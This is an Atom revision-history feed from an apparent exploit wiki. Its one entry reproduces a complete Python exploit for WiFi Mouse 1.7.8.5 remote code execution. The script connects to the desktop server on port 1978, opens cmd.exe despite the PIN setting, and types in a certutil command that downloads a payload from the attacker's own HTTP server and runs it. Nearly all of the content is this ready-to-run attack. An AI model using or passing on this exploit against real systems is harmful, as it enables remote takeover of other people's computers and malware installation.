<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>WiFi Mouse 1.7.8.5遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T14:45:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=337&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wif...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WiFi_Mouse_1.7.8.5%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=337&amp;oldid=prev"/>
		<updated>2021-03-12T08:02:22Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wif...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution&lt;br /&gt;
# Date: 25-02-2021&lt;br /&gt;
# Author: H4rk3nz0&lt;br /&gt;
# Vendor Homepage: http://necta.us/&lt;br /&gt;
# Software Link: http://wifimouse.necta.us/#download&lt;br /&gt;
# Version: 1.7.8.5&lt;br /&gt;
# Tested on: Windows Enterprise Build 17763&lt;br /&gt;
&lt;br /&gt;
# Desktop Server software used by mobile app has PIN option which does not to prevent command input.&lt;br /&gt;
# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
from socket import socket, AF_INET, SOCK_STREAM&lt;br /&gt;
from time import sleep&lt;br /&gt;
import sys&lt;br /&gt;
import string&lt;br /&gt;
&lt;br /&gt;
target = socket(AF_INET, SOCK_STREAM)&lt;br /&gt;
port = 1978&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
	rhost = sys.argv[1]&lt;br /&gt;
	lhost = sys.argv[2]&lt;br /&gt;
	payload = sys.argv[3]&lt;br /&gt;
except:&lt;br /&gt;
	print(&amp;quot;USAGE: python &amp;quot; + sys.argv[0]+ &amp;quot; &amp;lt;target-ip&amp;gt; &amp;lt;local-http-server-ip&amp;gt; &amp;lt;payload-name&amp;gt;&amp;quot;)&lt;br /&gt;
	exit()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
characters={&lt;br /&gt;
	&amp;quot;A&amp;quot;:&amp;quot;41&amp;quot;,&amp;quot;B&amp;quot;:&amp;quot;42&amp;quot;,&amp;quot;C&amp;quot;:&amp;quot;43&amp;quot;,&amp;quot;D&amp;quot;:&amp;quot;44&amp;quot;,&amp;quot;E&amp;quot;:&amp;quot;45&amp;quot;,&amp;quot;F&amp;quot;:&amp;quot;46&amp;quot;,&amp;quot;G&amp;quot;:&amp;quot;47&amp;quot;,&amp;quot;H&amp;quot;:&amp;quot;48&amp;quot;,&amp;quot;I&amp;quot;:&amp;quot;49&amp;quot;,&amp;quot;J&amp;quot;:&amp;quot;4a&amp;quot;,&amp;quot;K&amp;quot;:&amp;quot;4b&amp;quot;,&amp;quot;L&amp;quot;:&amp;quot;4c&amp;quot;,&amp;quot;M&amp;quot;:&amp;quot;4d&amp;quot;,&amp;quot;N&amp;quot;:&amp;quot;4e&amp;quot;,&lt;br /&gt;
	&amp;quot;O&amp;quot;:&amp;quot;4f&amp;quot;,&amp;quot;P&amp;quot;:&amp;quot;50&amp;quot;,&amp;quot;Q&amp;quot;:&amp;quot;51&amp;quot;,&amp;quot;R&amp;quot;:&amp;quot;52&amp;quot;,&amp;quot;S&amp;quot;:&amp;quot;53&amp;quot;,&amp;quot;T&amp;quot;:&amp;quot;54&amp;quot;,&amp;quot;U&amp;quot;:&amp;quot;55&amp;quot;,&amp;quot;V&amp;quot;:&amp;quot;56&amp;quot;,&amp;quot;W&amp;quot;:&amp;quot;57&amp;quot;,&amp;quot;X&amp;quot;:&amp;quot;58&amp;quot;,&amp;quot;Y&amp;quot;:&amp;quot;59&amp;quot;,&amp;quot;Z&amp;quot;:&amp;quot;5a&amp;quot;,&lt;br /&gt;
	&amp;quot;a&amp;quot;:&amp;quot;61&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;62&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;63&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;64&amp;quot;,&amp;quot;e&amp;quot;:&amp;quot;65&amp;quot;,&amp;quot;f&amp;quot;:&amp;quot;66&amp;quot;,&amp;quot;g&amp;quot;:&amp;quot;67&amp;quot;,&amp;quot;h&amp;quot;:&amp;quot;68&amp;quot;,&amp;quot;i&amp;quot;:&amp;quot;69&amp;quot;,&amp;quot;j&amp;quot;:&amp;quot;6a&amp;quot;,&amp;quot;k&amp;quot;:&amp;quot;6b&amp;quot;,&amp;quot;l&amp;quot;:&amp;quot;6c&amp;quot;,&amp;quot;m&amp;quot;:&amp;quot;6d&amp;quot;,&amp;quot;n&amp;quot;:&amp;quot;6e&amp;quot;,&lt;br /&gt;
	&amp;quot;o&amp;quot;:&amp;quot;6f&amp;quot;,&amp;quot;p&amp;quot;:&amp;quot;70&amp;quot;,&amp;quot;q&amp;quot;:&amp;quot;71&amp;quot;,&amp;quot;r&amp;quot;:&amp;quot;72&amp;quot;,&amp;quot;s&amp;quot;:&amp;quot;73&amp;quot;,&amp;quot;t&amp;quot;:&amp;quot;74&amp;quot;,&amp;quot;u&amp;quot;:&amp;quot;75&amp;quot;,&amp;quot;v&amp;quot;:&amp;quot;76&amp;quot;,&amp;quot;w&amp;quot;:&amp;quot;77&amp;quot;,&amp;quot;x&amp;quot;:&amp;quot;78&amp;quot;,&amp;quot;y&amp;quot;:&amp;quot;79&amp;quot;,&amp;quot;z&amp;quot;:&amp;quot;7a&amp;quot;,&lt;br /&gt;
	&amp;quot;1&amp;quot;:&amp;quot;31&amp;quot;,&amp;quot;2&amp;quot;:&amp;quot;32&amp;quot;,&amp;quot;3&amp;quot;:&amp;quot;33&amp;quot;,&amp;quot;4&amp;quot;:&amp;quot;34&amp;quot;,&amp;quot;5&amp;quot;:&amp;quot;35&amp;quot;,&amp;quot;6&amp;quot;:&amp;quot;36&amp;quot;,&amp;quot;7&amp;quot;:&amp;quot;37&amp;quot;,&amp;quot;8&amp;quot;:&amp;quot;38&amp;quot;,&amp;quot;9&amp;quot;:&amp;quot;39&amp;quot;,&amp;quot;0&amp;quot;:&amp;quot;30&amp;quot;,&lt;br /&gt;
	&amp;quot; &amp;quot;:&amp;quot;20&amp;quot;,&amp;quot;+&amp;quot;:&amp;quot;2b&amp;quot;,&amp;quot;=&amp;quot;:&amp;quot;3d&amp;quot;,&amp;quot;/&amp;quot;:&amp;quot;2f&amp;quot;,&amp;quot;_&amp;quot;:&amp;quot;5f&amp;quot;,&amp;quot;&amp;lt;&amp;quot;:&amp;quot;3c&amp;quot;,&lt;br /&gt;
	&amp;quot;&amp;gt;&amp;quot;:&amp;quot;3e&amp;quot;,&amp;quot;[&amp;quot;:&amp;quot;5b&amp;quot;,&amp;quot;]&amp;quot;:&amp;quot;5d&amp;quot;,&amp;quot;!&amp;quot;:&amp;quot;21&amp;quot;,&amp;quot;@&amp;quot;:&amp;quot;40&amp;quot;,&amp;quot;#&amp;quot;:&amp;quot;23&amp;quot;,&amp;quot;$&amp;quot;:&amp;quot;24&amp;quot;,&amp;quot;%&amp;quot;:&amp;quot;25&amp;quot;,&amp;quot;^&amp;quot;:&amp;quot;5e&amp;quot;,&amp;quot;&amp;amp;&amp;quot;:&amp;quot;26&amp;quot;,&amp;quot;*&amp;quot;:&amp;quot;2a&amp;quot;,&lt;br /&gt;
	&amp;quot;(&amp;quot;:&amp;quot;28&amp;quot;,&amp;quot;)&amp;quot;:&amp;quot;29&amp;quot;,&amp;quot;-&amp;quot;:&amp;quot;2d&amp;quot;,&amp;quot;'&amp;quot;:&amp;quot;27&amp;quot;,'&amp;quot;':&amp;quot;22&amp;quot;,&amp;quot;:&amp;quot;:&amp;quot;3a&amp;quot;,&amp;quot;;&amp;quot;:&amp;quot;3b&amp;quot;,&amp;quot;?&amp;quot;:&amp;quot;3f&amp;quot;,&amp;quot;`&amp;quot;:&amp;quot;60&amp;quot;,&amp;quot;~&amp;quot;:&amp;quot;7e&amp;quot;,&lt;br /&gt;
	&amp;quot;\\&amp;quot;:&amp;quot;5c&amp;quot;,&amp;quot;|&amp;quot;:&amp;quot;7c&amp;quot;,&amp;quot;{&amp;quot;:&amp;quot;7b&amp;quot;,&amp;quot;}&amp;quot;:&amp;quot;7d&amp;quot;,&amp;quot;,&amp;quot;:&amp;quot;2c&amp;quot;,&amp;quot;.&amp;quot;:&amp;quot;2e&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def openCMD():&lt;br /&gt;
	target.sendto(&amp;quot;6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a&amp;quot;.decode(&amp;quot;hex&amp;quot;), (rhost,port)) # openfile /C/Windows/System32/cmd.exe&lt;br /&gt;
&lt;br /&gt;
def SendString(string):&lt;br /&gt;
	for char in string:&lt;br /&gt;
		target.sendto((&amp;quot;7574663820&amp;quot; + characters[char] + &amp;quot;0a&amp;quot;).decode(&amp;quot;hex&amp;quot;),(rhost,port)) # Sends Character hex with packet padding&lt;br /&gt;
		sleep(0.03)&lt;br /&gt;
&lt;br /&gt;
def SendReturn():&lt;br /&gt;
	target.sendto(&amp;quot;6b657920203352544e&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
&lt;br /&gt;
def exploit():&lt;br /&gt;
	print(&amp;quot;[+] 3..2..1..&amp;quot;)&lt;br /&gt;
	sleep(2)&lt;br /&gt;
	openCMD()&lt;br /&gt;
	print(&amp;quot;[+] *Super fast hacker typing*&amp;quot;)&lt;br /&gt;
	sleep(1)&lt;br /&gt;
	SendString(&amp;quot;certutil.exe -urlcache -f http://&amp;quot; + lhost + &amp;quot;/&amp;quot; + payload + &amp;quot; C:\\Windows\\Temp\\&amp;quot; + payload)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	print(&amp;quot;[+] Retrieving payload&amp;quot;)&lt;br /&gt;
	sleep(3)&lt;br /&gt;
	SendString(&amp;quot;C:\\Windows\\Temp\\&amp;quot; + payload)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	print(&amp;quot;[+] Done! Check Your Listener?&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def main():&lt;br /&gt;
	target.connect((rhost,port))&lt;br /&gt;
	exploit()&lt;br /&gt;
	target.close()&lt;br /&gt;
	exit()&lt;br /&gt;
&lt;br /&gt;
if __name__==&amp;quot;__main__&amp;quot;:&lt;br /&gt;
	main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>